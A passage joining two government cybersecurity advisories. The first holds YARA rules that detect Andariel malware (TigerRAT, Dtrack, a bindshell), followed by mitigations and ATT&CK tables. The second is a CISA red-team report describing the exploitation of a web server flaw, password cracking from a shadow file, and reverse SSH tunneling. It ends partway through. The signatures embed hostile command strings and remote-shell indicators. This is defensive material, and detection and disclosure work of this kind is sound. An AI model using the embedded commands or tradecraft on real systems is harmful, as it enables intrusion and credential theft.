        $xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 }
        $stackstrings = {C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24}
    condition:
        uint16(0) == 0x5a4d and (#xor > 100 and #stackstrings > 5)
}
rule Andariel_GoLang_validalpha_handshake
{
    strings:
        $ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 }
    condition:
        all of them
}
rule Andariel_GoLang_validalpha_tasks
{
    strings:
        $ = “main.ScreenMonitThread”
        $ = “main.CmdShell”
        $ = “main.GetAllFoldersAndFiles”
        $ = “main.SelfDelete”
    condition:
        all of them
}
rule Andariel_GoLang_validalpha_BlackString
{
    strings:
    $ = “I:/01___Tools/02__RAT/Black”
    condition:
    uint16(0) == 0x5A4D and all of them
}
rule INDICATOR_EXE_Packed_VMProtect {
        strings:
        $s1 = “.vmp0” fullword ascii
        $s2 = “.vmp1” fullword ascii
    condition:
        uint16(0) == 0x5a4d and all of them or
        for any i in (0 .. pe.number_of_sections) : (
            (
                pe.sections[i].name == “.vmp0” or
                pe.sections[i].name == “.vmp1”
            )
        )
}
rule INDICATOR_EXE_Packed_Themida {
        strings:
        $s1 = “.themida” fullword ascii
    condition:
        uint16(0) == 0x5a4d and all of them or
        for any i in (0 .. pe.number_of_sections) : (
            (
                pe.sections[i].name == “.themida”
            )
        )
}
rule Andariel_elf_backdoor_fipps
{
strings:
        $a = “found mac address”
        $b = “RecvThread”
        $c = “OpenSSL-1.0.0-fipps”
        $d = “Disconnected!”
    condition:
        (all of them) and uint32(0) == 0x464c457f
}
rule Andariel_bindshell
{
strings:
 $str_comspec = “COMSPEC”
 $str_consolewindow = “GetConsoleWindow”
 $str_ShowWindow = “ShowWindow”
 $str_WSASocketA = “WSASocketA”
 $str_CreateProcessA = “CreateProcessA”
 $str_port = {B9 4D 05 00 00 89}
condition:
uint16(0) == 0x5A4D and all of them
}
rule Andariel_grease2
{
strings:
 $str_rdpconf = “c: \\windows\\temp\\RDPConf.exe” fullword nocase
 $str_rdpwinst = “c: \\windows\\temp\\RDPWInst.exe” fullword nocase
 $str_net_user = “net user”
 $str_admins_add = “net localgroup administrators”
condition:
uint16(0) == 0x5A4D and
all of them
}
rule Andariel_NoPineapple_Dtrack_unpacked
{
strings:
 $str_nopineapple = “”
 $str_qt_library = “Qt 5.12.10”
 $str_xor = {8B 10 83 F6 ?? 83 FA 01 77}
condition:
uint16(0) == 0x5A4D and
all of them
}
rule Andariel_dtrack_unpacked
{
strings:
 $str_mutex = “MTX_Global”
 $str_cmd_1 = “/c net use \\\\” wide
 $str_cmd_2 = “/c ping -n 3 127.0.01 > NUL % echo EEE > \”%s\”” wide
 $str_cmd_3 = “/c move /y %s \\\\” wide
 $str_cmd_4 = “/c systeminfo > \”%s\” & tasklist > \”%s\” & netstat -naop tcp > \”%s\”” wide
condition:
uint16(0) == 0x5A4D and
all of them
}
rule Andariel_TigerRAT_crowdsourced_rule {
    strings:
        $m1 = “.?AVModuleKeyLogger@@” fullword ascii
        $m2 = “.?AVModulePortForwarder@@” fullword ascii
        $m3 = “.?AVModuleScreenCapture@@” fullword ascii
        $m4 = “.?AVModuleShell@@” fullword ascii
        $s1 = “\\x9891-009942-xnopcopie.dat” fullword wide
        $s2 = “(%02d : %02d-%02d %02d:%02d:%02d)— %s[Clipboard]” fullword ascii
        $s3 = “[%02d : %02d-%02d %02d:%02d:%02d]— %s[Title]” fullword ascii
        $s4 = “del \”%s\”%s \”%s\” goto ” ascii
        $s5 = “[    condition:
        uint16(0) == 0x5a4d and (all of ($s*) or (all of ($m*) and 1 of ($s*)) or (2 of ($m*) and 2 of ($s*)))
}
rule win_tiger_rat_auto {
    strings:
        $sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 }
            // n = 5, score = 200
            //   33c0                 | jmp                 5
            //   89442438             | dec                 eax
            //   89442430             | mov                 eax, ecx
            //   448bcf               | movzx               eax, byte ptr [eax]
            //   4533c0               | dec                 eax

        $sequence_1 = { 41b901000000 488bd6 488bcb e8???????? }
            // n = 4, score = 200
            //   41b901000000         | dec                 eax
            //   488bd6                | mov                 eax, dword ptr [ecx]
            //   488bcb               | jmp                 8
            //   e8????????           |                     

        $sequence_2 = { 4881ec90050000 8b01 8985c8040000 8b4104 }
            // n = 4, score = 200
            //   4881ec90050000       | test                eax, eax
            //   8b01                 | jns                 0x16
            //   8985c8040000         | dec                 eax
            //   8b4104               | mov                 eax, dword ptr [ecx]

        $sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 }
            // n = 4, score = 200
            //   488b01               | mov                 edx, esi
            //   ff10                 | dec                 eax
            //   488b4f08             | mov                 ecx, ebx
            //   4c8d4c2430           | inc                 ecx

        $sequence_4 = { 488b01 ff10 488b4e18 488b01 }
            // n = 4, score = 200
            //   488b01               | dec                 eax
            //   ff10                 | cmp                 dword ptr [ecx + 0x18], 0x10
            //   488b4e18             | dec                 eax
            //   488b01               | sub                 esp, 0x590

        $sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 }
            // n = 4, score = 200
            //   4881eca0000000       | mov                 eax, dword ptr [ecx]
            //   33c0                 | mov                 dword ptr [ebp + 0x4c8], eax
            //   488bd9               | mov                 eax, dword ptr [ecx + 4]
            //   488d4c2432           | mov                 dword ptr [ebp + 0x4d0], eax

        $sequence_6 = { 488b01 eb03 488bc1 0fb600 }
            // n = 4, score = 200
            //   488b01               | inc                 ecx
            //   eb03                 | mov                 ebx, dword ptr [ebp + ebp]
            //   488bc1               | inc                 ecx
            //   0fb600               | movups              xmmword ptr [edi], xmm0

        $sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 }
            // n = 5, score = 200
            //   488b01               | sub                 esp, 0x30
            //   8b10                 | dec                 ecx
            //   895124               | mov                 ebx, eax
            //   448b4124             | dec                 eax
            //   4585c0               | mov                 ecx, eax

        $sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 }
            // n = 4, score = 100
            //   4c8d0d31eb0000       | jne                 0x1e6
            //   c1e918               | dec                 eax
            //   c1e808               | lea                 ecx, [0xbda0]
            //   41bf00000080         | dec                 esp

        $sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 }
            // n = 7, score = 100
            //   488bd8               | dec                 eax
            //   4885c0               | mov                 ebx, eax
            //   752d                 | dec                 eax
            //   ff15????????         |                     
            //   83f857               | test                eax, eax
            //   0f85e0010000         | jne                 0x2f
            //   488d0da0bd0000       | cmp                  eax, 0x57

        $sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b }
            // n = 5, score = 100
            //   75d4                 | lea                 ecx, [0xeb31]
            //   488d1d7f6c0100       | shr                 ecx, 0x18
            //   488b4bf8             | shr                 eax, 8
            //   4885c9               | inc                 ecx
            //   740b                 | mov                 edi, 0x80000000

        $sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? eb6b b9f4ffffff }
            // n = 7, score = 100
            //   0f85d9000000         | jne                 0xffffffd6
            //   488d15d0c90000       | dec                 eax
            //   41b810200100         | lea                 ebx, [0x16c7f]
            //   488bcd               | dec                 eax
            //   e8????????           |                     
            //   eb6b                 | mov                 ecx, dword ptr [ebx – 8]
            //   b9f4ffffff           | dec                 eax

        $sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000 488905???????? }
            // n = 6, score = 100
            //    48890d????????       |                     
            //   488905????????       |                     
            //   488d05ae610000       | test                ecx, ecx
            //   488905????????       |                     
            //   488d05a0550000       | je                  0x10
            //   488905????????       |                     

        $sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 }
            // n = 6, score = 100
            //   8bcf                  | mov                 eax, 0x12010
            //   e8????????           |                     
            //   488b7c2448           | dec                 eax
            //   85c0                 | mov                 ecx, ebp
            //   0f8440030000         | jmp                 0x83
            //   488d0560250100       | mov                 ecx, 0xfffffff4

        $sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905???????? 8b05???????? }
            // n = 7, score = 100
            //   ff15????????         |                     
            //   8b05????????         |                     
            //   2305????????         |                     
            //   ba02000000           | dec                 eax
            //   33c9                 | lea                 eax, [0x61ae]
            //   8905????????         |                     
            //   8b05????????         |                     

        $sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 }
            // n = 5, score = 100
            //   4883ec30             | jne                 0xdf
            //   498bd8               | dec                 eax
            //   e8????????           |                     
            //   488bc8               | lea                 edx, [0xc9d0]
            //   4885c0               | inc                 ecx

    condition:
        7 of them and filesize }

rule win_dtrack_auto {
    strings:
        $sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 }
            // n = 7, score = 400
            //   52                   | push                edx
            //   8b4508               | mov                 eax, dword ptr [ebp + 8]
            //   50                   | push                eax
            //   e8????????           |                     
            //   83c414               | add                 esp, 0x14
            //   8b4d10               | mov                 ecx, dword ptr [ebp + 0x10]
            //   51                   | push                ecx

        $sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae c78544f6ffff00000000 }
            // n = 7, score = 300
            //   3a4101               | cmp                 al, byte ptr [ecx + 1]
            //    7523                 | jne                 0x25
            //   83854cf6ffff02       | add                 dword ptr [ebp – 0x9b4], 2
            //   838550f6ffff02       | add                 dword ptr [ebp – 0x9b0], 2
            //   80bd4af6ffff00       | cmp                 byte ptr [ebp – 0x9b6], 0
            //   75ae                 | jne                 0xffffffb0
            //   c78544f6ffff00000000     | mov     dword ptr [ebp – 0x9bc], 0

        $sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 }
            // n = 7, score = 300
            //   50                   | push                eax
            //   ff15????????         |                     
            //   a3????????           |                     
            //   68????????           |                     
            //   e8????????           |                     
            //   83c404               | add                 esp, 4
            //   50                   | push                eax

        $sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? }
            // n = 5, score = 300
            //   8d8dd4faffff         | lea                 ecx, [ebp – 0x52c]
            //   51                   | push                ecx
            //   e8????????           |                     
            //   83c408               | add                 esp, 8
            //   8b15????????         |                     

        $sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? }
            // n = 5, score = 300
            //   8855f5               | mov                 byte ptr [ebp – 0xb], dl
            //   6a5c                 | push                0x5c
            //   8b450c               | mov                 eax, dword ptr [ebp + 0xc]
            //   50                   | push                eax
            //   e8????????           |                     

        $sequence_5 = { 51 e8???????? 83c410 8b558c 52 }
            // n = 5, score = 300
            //   51                   | push                ecx
            //   e8????????           |                     
            //   83c410               | add                 esp, 0x10
            //   8b558c                | mov                 edx, dword ptr [ebp – 0x74]
            //   52                   | push                edx

        $sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? }
            // n = 6, score = 300
            //   8b4d0c               | mov                 ecx, dword ptr [ebp + 0xc]
            //   51                   | push                ecx
            //   68????????           |                     
            //   8d9560eaffff         | lea                 edx, [ebp – 0x15a0]
            //   52                   | push                edx
            //   e8????????           |                     

        $sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 }
            // n = 5, score = 300
            //   83c001               | add                 eax, 1
            //   8945f4               | mov                 dword ptr [ebp – 0xc], eax
            //   837df420             | cmp                 dword ptr [ebp – 0xc], 0x20
            //   7d2c                 | jge                 0x2e
            //   8b4df8               | mov                 ecx, dword ptr [ebp – 8]

        $sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 }
            // n = 4, score = 300
            //   83c001               | add                 eax, 1
            //   89856cf6ffff         | mov                 dword ptr [ebp – 0x994], eax
            //   8b8d70f6ffff         | mov                 ecx, dword ptr [ebp – 0x990]
            //   8a11                 | mov                 dl, byte ptr [ecx]

        $sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 }
            // n = 6, score = 200
            //   0355f0               | add                 edx, dword ptr [ebp – 0x10]
            //   0fb602               | movzx               eax, byte ptr [edx]
            //   0fb64df7             | movzx               ecx, byte ptr [ebp – 9]
            //   33c1                 | xor                 eax, ecx
            //    0fb655fc             | movzx               edx, byte ptr [ebp – 4]
            //   33c2                 | xor                 eax, edx

        $sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 }
            // n = 5, score = 200
            //   d1e9                 | shr                 ecx, 1
            //   894df8               | mov                 dword ptr [ebp – 8], ecx
            //   8b5518               | mov                 edx, dword ptr [ebp + 0x18]
            //   8955fc               | mov                 dword ptr [ebp – 4], edx
            //   c745f000000000       | mov                 dword ptr [ebp – 0x10], 0

        $sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 }
            // n = 6, score = 200
            //   8b4df0               | mov                 ecx, dword ptr [ebp – 0x10]
            //   3b4d10               | cmp                 ecx, dword ptr [ebp + 0x10]
            //   0f8d90000000         | jge                 0x96
            //   8b5508               | mov                 edx, dword ptr [ebp + 8]
            //   0355f0               | add                 edx, dword ptr [ebp – 0x10]
            //   0fb602               | movzx               eax, byte ptr [edx]

        $sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 }
            // n = 6, score = 200
            //   894d14               | mov                 dword ptr [ebp + 0x14], ecx
            //   8b45f8               | mov                 eax, dword ptr [ebp – 8]
            //   c1e018               | shl                 eax, 0x18
            //   8b4dfc               | mov                 ecx, dword ptr [ebp – 4]
            //   c1e908               | shr                 ecx, 8
            //   0bc1                 | or                  eax, ecx

        $sequence_13 = { 0bc1 894518 8b5514 8955f8 }
            // n = 4, score = 200
            //   0bc1                 | or                  eax, ecx
            //   894518               | mov                 dword ptr [ebp + 0x18], eax
            //   8b5514               | mov                 edx, dword ptr [ebp + 0x14]
            //   8955f8               | mov                 dword ptr [ebp – 8], edx

        $sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 }
            // n = 6, score = 200
            //   8b5514               | mov                 edx, dword ptr [ebp + 0x14]
            //   8955f8               | mov                 dword ptr [ebp – 8], edx
            //   8b4518               | mov                 eax, dword ptr [ebp + 0x18]
            //   8945fc               | mov                 dword ptr [ebp – 4], eax
            //   e9????????           |                     
            //   8be5                 | mov                 esp, ebp

    condition:
        7 of them and filesize }

Mitigation Measures

The authoring agencies recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity.

Log4Shell and Other Log4j Vulnerabilities

Defenders should consult the joint Cybersecurity Advisory titled “Mitigating Log4Shell and Other Log4j-Related Vulnerabilities” and CISA’s “Apache Log4j Vulnerability” guidance. Organizations can mitigate the risks posed by the vulnerability by identifying assets affected by Log4Shell and other Log4j-related vulnerabilities and upgrading Log4j assets and affected products to the latest version. 

Note: CVE-2021-44228 ‘Log4Shell’ was disclosed in December 2021 and affects the Log4j library prior to version 2.17.0.

Defenders should remain alert to vendor software updates, and initiate hunt and incident response procedures to detect possible Log4Shell exploitation.

Web Shell Malware

Web shell malware is deployed by adversaries on a victim’s web server to execute arbitrary system commands. The NSA and Australian Signals Directorate’s report titled “Detect and Prevent Web Shell Malware” provides mitigating actions to identify and recover from web shells.

Preventing exploitation of web-facing servers often depends on maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs).

Endpoint Activity

Preventing and detecting further adversary activity should focus on deploying endpoint agents or other monitoring mechanisms, blocking unnecessary outbound connections, blocking external access to administrator panels and services or turning them off entirely, and segmenting the network to prevent lateral movement from a compromised web server to critical assets.

Command Line Activity and Remote Access

Monitoring for suspicious command-line activity, implementing multi-factor authentication for remote access services, and properly segmenting and using allow-listing tools for critical assets can protect against malicious activity by RGB 3rd Bureau’s Andariel group and other cyber threat actors.

Packing

Signatures for Themida, VMProtect and a number of other packers are available here, however, the signatures will not identify every file packed using these applications.

  • Check for security vulnerabilities, apply patches, and update to the latest version of software
  • Encrypt all sensitive data including personal information
  • Block access to unused ports
  • Change passwords when they are suspected of being compromised
  • Strengthen the subscriber identity authentication process for leased servers

DPRK Rewards for Justice

The U.S. and ROK Governments encourage victims to report suspicious activities, including those related to suspected DPRK cyber activities, to relevant authorities. If you provide information about illicit DPRK activities in cyberspace, including past or ongoing operations, you may be eligible for a reward. If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State’s Rewards for Justice program could make you eligible to receive an award of up to $10 million. For further details, please visit https://rewardsforjustice.net/.

Acknowledgements

Mandiant and Microsoft Threat Intelligence contributed to this CSA.

Disclaimer of Endorsement

Your organization has no obligation to respond or provide information in response to this product.  If, after reviewing the information provided, your organization decides to provide information to the authorizing agencies, it must do so consistent with applicable state and federal law.

The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or service by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the co-authors.

Trademark Recognition

Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation.

Purpose

This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Contact

U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at [email protected] or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/fieldoffices.

DC3 Cyber Forensics Laboratory (CFL): [email protected]

DoD-Defense Industrial Base (DIB) Collaborative Information Sharing Environment (DCISE): [email protected]

NSA Cybersecurity Report Questions and Feedback: [email protected]

NSA Defense Industrial Base Inquiries and Cybersecurity Services: [email protected]

NSA Media Inquiries / Press Desk: 443-634-0721, [email protected]

Republic of Korea organizations: If you suspect cyber incidents involving state actors, including Andariel, or discover similar cases, please contact the relevant authorities below.

National Intelligence Service: www.nis.go.kr, +82 111

References

AhnLab Security Emergency Response Center:

Boredhackerblog: http://www.boredhackerblog.info/2022/11/openssl-100-fipps-linux-backdoor-notes.html

Cisco Talos Intelligence blogs:

DCSO blog: https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499

Github.com/ditekshen: https://github.com/ditekshen/detection/blob/master/yara/indicator_packed.yar

JPCERT blogs:

Mandiant blogs:

Microsoft blogs:

NSCS Guidance:

Symantec blog: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research

VMware blog: https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html

WithSecure Labs report: https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector

Appendix: MITRE ATT&CK Techniques and Software

The tactics and techniques referenced in this advisory are identified in Table 3 – Table 12.

Table 3. Reconnaissance and Enumeration
Technique Title ID Use
Gather Victim Org Information T1591 The actors gather information about the victim’s organization that can be used during targeting.
Gather Victim Host Information T1592 The actors gather information about the victim’s hosts that can be used during targeting.
Active Scanning T1595 The actors execute active reconnaissance scans to gather information that can be used during targeting.
Search Open Technical Databases T1596 The actors search freely available technical databases for information about victims that can be used during targeting.
Table 4. Resource Development, Tooling, and Remote Access Tools (RATs)
Technique Title ID Use
OS Credential Dumping T1003 The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.
Exfiltration Over Alternative Protocol T1048 The actors steal data by exfiltrating it over a different protocol than that of the existing command and control channel.
Proxy T1090 The actors use a connection proxy to direct network traffic between systems or act as intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.
Archive Collected Data T1560 The actors compress and/or encrypt data that is collected prior to exfiltration.
Protocol Tunneling T1572 The actors tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems.
Develop Capabilities: Malware T1587.001 The actors develop malware and malware components that can be used during targeting.
Develop Capabilities: Exploits T1587.004 The actors develop exploits that can be used during targeting.
Table 5. Software used for Resource Development, Tooling, and RATs
Software Title ID Use
Mimikatz S0002 The actors use a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.
AdFind S0552 The actors use a free command-line query tool that can be used for gathering information from the Active Directory.
Table 6. Initial Access
Technique Title ID Use
Exploit Public-Facing Application T1190 The actors attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Table 7. Execution
Technique Title ID Use
Command and Scripting Interpreter T1059 The actors abuse command and script interpreters to execute commands, scripts, or binaries.
Table 8. Defense Evasion
Technique Title ID Use
Obfuscated Files or Information T1027 The actors attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its content on the system or in transit.
Table 9. Credential Access
Technique Title ID Use
OS Credential Dumping T1003 The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.
Table 10. Discovery and Lateral Movement
Technique Title ID Use
Remote Services T1021 The actors use valid accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC.
Remote Services: SMB/Windows Admin Shares T1021.002 The actors use valid accounts to interact with a remote network share using Server Message Block (SMB).
File and Directory Discovery T1083 The actors enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Account Discovery T1087 The actors attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment.
Table 11. Command and Control
Technique Title ID Use
Application Layer Protocol T1071 The actors establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, telnet, DNP3, and Modbus.
Proxy T1090 The actors use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.
Table 12. Collection and Exfiltration
Technique Title ID Use
Data from Network Shared Drive T1039 The actors search network shares on computers they have compromised to find files of interest.
Exfiltration Over Alternative Protocol T1048 The actors steal data by exfiltrating it over a different protocol than that of the existing command and control server.
Archive Collected Data T1560 The actors compress and/or encrypt data that is collected prior to exfiltration.
Exfiltration Over Web Service T1567 The actors use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

Source…

CISA Red Team’s Operations Against a Federal Civilian Executive Branch Organization Highlights the Necessity of Defense-in-Depth


EXECUTIVE SUMMARY

In early 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a SILENTSHIELD red team assessment against a Federal Civilian Executive Branch (FCEB) organization. During SILENTSHIELD assessments, the red team first performs a no-notice, long-term simulation of nation-state cyber operations. The team mimics the techniques, tradecraft, and behaviors of sophisticated threat actors and measures the potential dwell time actors have on a network, providing a realistic assessment of the organization’s security posture. Then, the team works directly with the organization’s network defenders, system administrators, and other technical staff to address strengths and weaknesses found during the assessment. The team’s goal is to assist the organization with refining their detection, response, and hunt capabilities—particularly hunting unknown threats.

In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory (CSA) detailing the red team’s activity and tactics, techniques, and procedures (TTPs); associated network defense activity; and lessons learned to provide network defenders with recommendations for improving their organization’s detection capabilities and cyber posture.

During the first phase, the SILENTSHIELD team gained initial access by exploiting a known vulnerability in an unpatched web server in the victim’s Solaris enclave. Although the team fully compromised the enclave, they were unable to move into the Windows portion of the network due to a lack of credentials. In a parallel effort, the team gained access to the Windows network through phishing. They then discovered unsecured administrator credentials, allowing them to pivot freely throughout the Windows environment, which resulted in full domain compromise and access to tier zero assets. The team then identified that the organization had trust relationships with multiple external partner organizations and was able to exploit and pivot to an external organization. The red team remained undetected by network defenders throughout the first phase.

The red team’s findings underscored the importance of defense-in-depth and using diversified layers of protection. The organization was only able to fully understand the extent of the red team’s compromise by running full diagnostics from all data sources. This involved analyzing host-based logs, internal network logs, external (egress) network logs, and authentication logs.

The red team’s findings also demonstrated the value of using tool-agnostic and behavior-based indicators of compromise (IOCs) and of applying an “allowlist” approach to network behavior and systems, rather than a “denylist” approach, which predominantly results in an unmanageable amount of noise. The red team’s findings illuminated the following lessons learned for network defenders about how to reduce and respond to risk:

  • Lesson learned: The assessed organization had insufficient controls to prevent and detect malicious activity.
  • Lesson learned: The organization did not effectively or efficiently collect, retain, and analyze logs.
  • Lesson learned: Bureaucratic processes and decentralized teams hindered the organization’s network defenders.
  • Lesson learned: A “known-bad” detection approach hampered detection of alternate TTPs.

To reduce risk of similar malicious cyber activity, CISA encourages organizations to apply the recommendations in the Mitigations section of this advisory, including those listed below:

  • Apply defense-in-depth principles by using multiple layers of security to ensure comprehensive analysis and detection of possible intrusions.
  • Use robust network segmentation to impede lateral movement across the network.
  • Establish baselines of network traffic, application execution, and account authentication. Use these baselines to enforce an “allowlist” philosophy rather than denying known-bad IOCs. Ensure monitoring and detection tools and procedures are primarily behavior-based, rather than IOC-centric.

CISA recognizes that insecure software contributes to these identified issues and urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this CSA, including those listed below, to harden customer networks against malicious activity and reduce the likelihood of domain compromise:

  • Eliminate default passwords.
  • Provide logging at no additional charge.
  • Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers—in conjunction with customers—to understand how response teams use logs to investigate incidents.

Download the PDF version of this report:

INTRODUCTION

CISA has authority to hunt for and identify, with or without advance notice to or authorization from agencies, threats and vulnerabilities within federal information systems (see generally 44 U.S.C. § 3553[b][7]). The target organization for this assessment was a large U.S. FCEB organization. CISA conducted the SILENTSHIELD assessment over an approximately eight-month period in 2023, with three of the months consisting of a technical collaboration phase:

  • Adversary Emulation Phase: The team started by emulating a sophisticated nation-state actor by simulating known initial access and post-exploitation TTPs. The team’s goal was to compromise the assessed organization’s domain and identify attack paths to other networks. After completion of their initial objectives, the team diversified its deployed tools and tradecraft to mimic a wider and often less sophisticated set of threat actors to elicit network defender attention. CISA red team members did not clean up or delete system logs, allowing defenders to investigate all artifacts and identify the full scope of a breach.
  • Collaboration Phase: The SILENTSHIELD team met regularly with senior staff and technical personnel to discuss issues with the organization’s cyber defensive capabilities. During this phase, the team:

This advisory, drafted in coordination with the assessed organization, details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders recommendations for improving their organization’s defensive cyber posture. The advisory also provides recommendations to software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise.

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool

During the Adversary Emulation phase, the red team gained initial access to the organization’s Solaris enclave by exploiting a known vulnerability in an unpatched web server. They gained separate access to the Windows environment by phishing and were able to compromise the full domain and its parent domain. See Figure 1 for a timeline of this assessment and the sections below for details on the team’s activity and TTPs.

Figure 1: SILENTSHIELD assessment timeline

Adversary Emulation Phase

Exploitation of the Solaris Enclave

Reconnaissance, Initial Access, and Command and Control

CISA’s red team used open source tools and third-party services to probe the organization’s internet-facing surface [T1594]. This included non-intrusive port scans for common ports and Domain Name System (DNS) enumeration [T1590.002]. These efforts revealed the organization’s web server was unpatched for CVE-2022-21587, an unauthenticated remote code execution (RCE) vulnerability in Oracle Web Applications Desktop Integrator. For three months the assessed organization failed to patch this vulnerability, and the team exploited it for initial access.

The exploit provided code execution on a backend application server (SERVER 1) that handled incoming requests from the public-facing web server. The red team used this exploit to upload and run a secure Python remote access tool (RAT). Because the application server had full external internet egress via Transmission Control Protocol (TCP) ports 80 and 443, the RAT enabled consistent command and control (C2) traffic [T1071.001].

Note: After gaining access, the team promptly informed the organization’s trusted agents of the unpatched device, but the organization took over two weeks to apply the available patch. Additionally, the organization did not perform a thorough investigation of the affected servers, which would have turned up IOCs and should have led to a full incident response. About two weeks after the team obtained access, exploit code was released publicly into a popular open source exploitation framework. CISA identified that the vulnerability was exploited by an unknown third party. CISA added this CVE to its Known Exploited Vulnerabilities Catalog on Feb. 2, 2023.

Credential Access, Command and Control, and Privilege Escalation

Once on SERVER 1, the red team probed the host’s files and folder structure [T1005] and identified several old and globally accessible .tar backup files, which included a readable copy of an /etc/shadow file containing the hash for a privileged service account (ACCOUNT 1). The team quickly cracked the account’s weak password using a common wordlist [T1110.002]. They then established an outbound Secure Shell Protocol (SSH) connection over TCP port 80 and used a reverse tunnel to SSH back into SERVER 1, where they were prompted to reset ACCOUNT 1’s expired password [T1571] (see Figure 2). The team identified the account was enabled on a subset of containers, but it had not been actively used in a significant amount of time; the team changed this account’s password to a strong password.

Figure 2: Exploitation of the Solaris Enclave

The team discovered ACCOUNT 1 was a local administrator with sudo/root access and used it to move laterally (see the next section).

Lateral Movement and Persistence

Servers in the Solaris enclave did not use centralized authentication but had a mostly uniform set of local accounts and permissions [T1078.002]. This allowed the red team to use ACCOUNT 1 to move through much of the network segment via SSH [T1021.004].

Some servers allowed external internet access and the team deployed RATs on a few of these hosts for C2. They deployed several different RATs to diversify network traffic signatures and obfuscate the on-disk and in-memory footprints. These tools communicated to a red team redirector over TCP/443, through valid HTTPS messages, and over SSH through non-standard ports (80 and 443) [T1571]. Much of the traffic was not blocked by a firewall, and the organization lacked application layer firewalls capable of detecting protocol mismatches on common ports. 

The team then moved laterally to multiple servers, including high value assets, that did not allow internet access. Using reverse SSH tunnels, the team moved into the environment and used a SOCKS proxy [T1090] to progress forward through the network. They configured implants with TCP bind listeners bound to random high ports to connect directly with some of these hosts without creating new SSH login events (see Figure 3).

Figure 3: Example of Lateral Movement in the Solaris Enclave

